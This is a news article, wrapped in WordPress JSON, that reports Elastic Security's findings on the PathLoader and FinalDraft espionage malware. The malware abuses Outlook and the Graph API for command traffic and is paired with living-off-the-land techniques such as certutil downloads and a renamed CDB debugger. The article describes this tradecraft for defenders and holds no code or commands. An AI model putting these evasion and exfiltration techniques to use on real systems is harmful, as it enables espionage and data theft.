{"id":1964,"date":"2025-02-17T21:49:51","date_gmt":"2025-02-17T21:49:51","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=1964"},"modified":"2025-02-17T21:49:51","modified_gmt":"2025-02-17T21:49:51","slug":"new-family-of-data-stealing-malware-leverages-microsoft-outlook","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=1964","title":{"rendered":"New family of data-stealing malware leverages Microsoft Outlook"},"content":{"rendered":"
\n
\n
\n
\n
<\/div>\n

CISOs have yet another attack vector to worry about with the discovery of a new family of data-stealing malware that uses Microsoft Outlook as a communications channel through abusing the Graph API, and includes a way to get around hashed passwords.<\/p>\n

Researchers from Elastic Security say the malware was created by an unnamed group targeting the foreign ministry of a South American nation, but there are also links to compromises at a university in Southeast Asia and telecoms in that region.<\/p>\n

The campaign is characterized by a \u201cwell-engineered, highly-capable, novel intrusion set, the researchers say in a report.<\/a><\/p>\n

The campaign against the South American country may have started in November, 2024. That\u2019s when Elastic Security detected a tight cluster of endpoint behavioral alerts within the country\u2019s Foreign Ministry. It isn\u2019t clear how the IT system was initially compromised, but the gang used living-off-the- land tactics once inside. That included using Windows\u2019 certutil<\/em> application \u2013 which handles certificates \u2014 to download files.<\/p>\n

Espionage seems to be the motive, says the report, and there are Windows and Linux versions of the malware. But fortunately the gang \u201cexhibited poor campaign management and inconsistent evasion tactics,\u201d it notes.<\/p>\n

Watch for the signs<\/h2>\n

Nevertheless, CISOs should be watching for signs of attack using this group\u2019s techniques, because their targets could become more widespread and the techniques more sophisticated.<\/p>\n

One thing CISOs should immediately note: After initial compromise, the gang used Windows Remote Management\u2019s Remote shell plugin (WinrsHost.exe<\/em>) \u2013 a client-side process used by Windows Remote Management \u2014 to download files.\u00a0These files include an executable, rar, ini, and log files. The executable is a renamed version of a Windows-signed debugger, CDB.exe<\/em>. Abuse of this binary, the report notes, allowed the attackers to execute malicious shellcode delivered in a config.ini<\/em> file under the guise of trusted binaries, the report says.<\/p>\n

Using WRM\u2019s shell plugin \u201cindicates that attackers already possessed valid network credentials and were using them for lateral movement from a previously compromised host in the environment,\u201d the report says. \u201cHow these credentials were obtained is unknown.\u201d<\/p>\n

Preventing lateral movement is always tricky if an attacker has obtained valid credentials, noted Johannes Ullrich, dean of research at the SANS Institute, in an email to CSO. \u201cThey could come from other breaches (credential stuffing) or maybe just from keystroke loggers or info stealers they may have deployed during earlier phases of the attack that are not covered in the writeup.\u201d<\/p>\n

The main components of the malware this attacker uses, which include a loader and a backdoor, are:<\/p>\n

Pathloader<\/strong>, a lightweight Windows executable file that downloads and executes encrypted shellcode hosted on a remote server. It uses techniques to avoid immediate execution in a target organization\u2019s sandbox. To block static analysis, it performs API hashing and string encryption;<\/p>\n

FinalDraft<\/strong>, 64-bit malware written in C++ that focuses on data exfiltration and process injection. It includes several modules that can be injected by the malware; their output is forwarded to a command and control (C2) server.
Among other things, it initially gathers information about compromised servers or PCs, including computer name, the account username, internal and external IP addresses, and details about running processes. FinalDraft also includes a pass-the-hash toolkit similar to Mimikatz to deal with stolen NTLM hashes.<\/p>\n

One method of communication is via the Outlook mail service, using the Microsoft Graph API. This API allows developers to access resources hosted on Microsoft cloud services, including Microsoft 365. Although a login token is needed for this API, the FinalDraft malware has the ability to capture a Graph API token. According to a report by Symantec last year,<\/a> a growing number of threat actors are abusing Graph API to hide communications.<\/p>\n

In addition, FinalDraft can, among other things, install a TCP listener after adding a rule to the Windows Firewall. This rule is removed when the server shuts down. It can also delete files \u2013 and prevents IT from recovering them by overwriting the data with zeros before deletion.<\/p>\n

\u201cI think this is a great example at using the \u201cliving-off-the-land\u201d (LOLBins) technique to its fullest potential,\u201d commented Ullrich. \u201cThis points to an adversary who did their homework to customize this attack to most effectively hit this target. An attack like this is truly difficult to defend against. the \u2018Advanced\u2019 in APT [advanced persistent threat] is often more visible in this preparation vs the actual tools used and execution of an attack.\u201d<\/p>\n

Detection rules<\/h2>\n

At the end of its report, Elastic Security lists several Yara rules it created and posted\u00a0on GitHub to help defenders. These rules\u00a0help detect PathLoader<\/a>\u00a0and\u00a0\u00a0FinalDraft<\/a>\u00a0on Windows, while this\u00a0rule detects FinalDraft on Linux<\/a>.<\/p>\n\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"

CISOs have yet another attack vector to worry about with the discovery of a new family of data-stealing malware that uses Microsoft Outlook as a communications channel through abusing the Graph API, and includes a way to get around hashed passwords. Researchers from Elastic Security say the malware was created by an unnamed group targeting […]<\/p>\n","protected":false},"author":0,"featured_media":1965,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-1964","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/1964"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1964"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/1964\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/1965"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1964"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1964"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1964"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}